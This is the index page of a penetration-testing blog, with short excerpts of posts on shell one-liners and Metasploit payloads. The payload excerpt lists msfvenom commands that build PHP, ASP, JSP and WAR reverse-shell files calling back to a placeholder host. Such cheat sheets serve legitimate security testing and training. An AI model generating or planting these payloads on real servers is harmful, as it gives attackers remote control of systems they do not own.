SAROOT.NET
The Collection of PenetrationTesting!
Menu Close
  • Home
  • Penetration Testing
  • Incident Response
  • Forensics
  • SysAdminSec

Uncategorized

Misc CMDs

Posted on April 18, 2021 by SAROOT

Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading →

Uncategorized grep, watch, xargs, xclip

Metasploit Payloads

Posted on April 18, 2021 by SAROOT

Web Based Payloads PHP msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > rshell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.jsp WAR (Tomcat) msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444… Continue Reading →

Uncategorized metasploit-payload, shell, shellcode

SAROOT.NET is back online

Posted on August 21, 2018 by SAROOT

Hey Friends and Welcome! Sorry to anyone who are waiting to access the site. 🙂 I am planing to bring this website online very shortly and I will keep adding interesting and useful stuff in to it. This new site… Continue Reading →

Uncategorized

Recent Posts

  • Misc CMDs
  • Metasploit Payloads
  • DNS – Enumeration Technics
  • OpenSSL useful commands
  • SNMP Enumeration

Tags

bruteforce (1) cracking (1) dig (1) dns (1) dnsrecon (1) grep (1) hashcat (1) metasploit-payload (1) nslookup (1) onesixtyone (1) openssl (1) shell (1) shellcode (1) snmp (1) snmpcheck (1) snmpenum (1) snmpwalk (1) ssl (1) tcpdump (1) tmux (1) watch (1) wordpress (1) wpscan (1) xargs (1) xclip (1)

Categories

  • Forensics (1)
  • Incident Response (1)
  • Penetration Testing (5)
  • SysAdminSec (1)
  • Uncategorized (3)
© 2025 SAROOT.NET. All rights reserved.
Hiero by aThemes